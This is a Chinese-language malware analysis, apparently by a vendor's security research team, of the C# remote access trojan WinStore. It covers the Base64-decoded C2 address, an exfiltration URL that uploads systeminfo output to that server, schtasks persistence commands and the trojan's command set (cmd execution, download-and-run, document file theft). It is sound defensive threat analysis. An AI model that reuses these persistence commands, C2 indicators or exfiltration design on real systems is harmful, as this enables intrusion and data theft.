C#远控WinStore分析

Posted 2021-04-14 启明星辰金睛安全研究团队

WinStore是一款C#语言编写的远程控制程序，具有窃取受害主机的系统信息、设置定时任务，执行远程CMD命令，遍历进程信息、文件信息、驱动器信息，并将执行结果上传到C&C，接收C&C命令进行远程控制主机。

详细分析

1、样本运行后首先查找进程名称“WinStore”，如果存在则退出，不存在则继续执行。

2、_getPIsTob()函数用Base64算法解密出C&C：“http://91.211.88.71/move/”

其中的_MainCV是硬编码的字符串：

将字符串中的逗号去掉，保存在array2数组中，将每个数据项转成ASCII码值对应的字符，再经过Base64解密，解密结果为http://91.211.88.71/move/。

3、函数_getMachNm()用来获取计算机名称。

4、POST方法上传窃取的敏感信息

执行systeminfo命令获取系统信息，拼接到url尾部，url如下：http://91.211.88.71/move/blue.php?MNVal=VENUS-272XXXXXX&FNVal=ConnInfo&DVal=

5、设置定时任务名称为“GetWinStoreUpdate”，每天执行WinStore.exe，并上传是否成功信息。

schtasks/delete /tn "GetWinStoreUpdate" /f

schtasks/create /tn "GetWinStoreUpdate" /tr "C:Documents andSettingsAdministratorApplication DataWinStoreWinStore.exe" /sc"DAILY"

6、根据C2返回的命令执行远控功能：包括进程管理、文件管理、命令执行等功能。

cmd命令：多个命令用“|”分隔开，执行命令后并回传cmd命令的执行结果到ResInfo.txt中。

Sfile命令：上传文件信息，包括文件的名称，文件的绝对路径，文件的二进制数据内容。

该RAT的主要功能包括：

命令	功能
cmd	执行一个或多个用“|”分隔的cmd命令
distroy	删除WinStore.exe并退出
tlist	枚举进程列表
expld	接收文件，并执行
getkeys	遍历目录WindowsServices\dasHost\下的文件信息
fldinfo	遍历多个指定目录的文件信息
drinfo	获取驱动器信息
files	查找指定目录下的扩展名的文件，包括： .doc,.txt,.docx,.ppt,.pptx,.rtf,.xls,.xlsx,.jpg,.jpeg,.png,.gif,.wmv,.pst,.csv,.pdf
sfile	上传文件的详细信息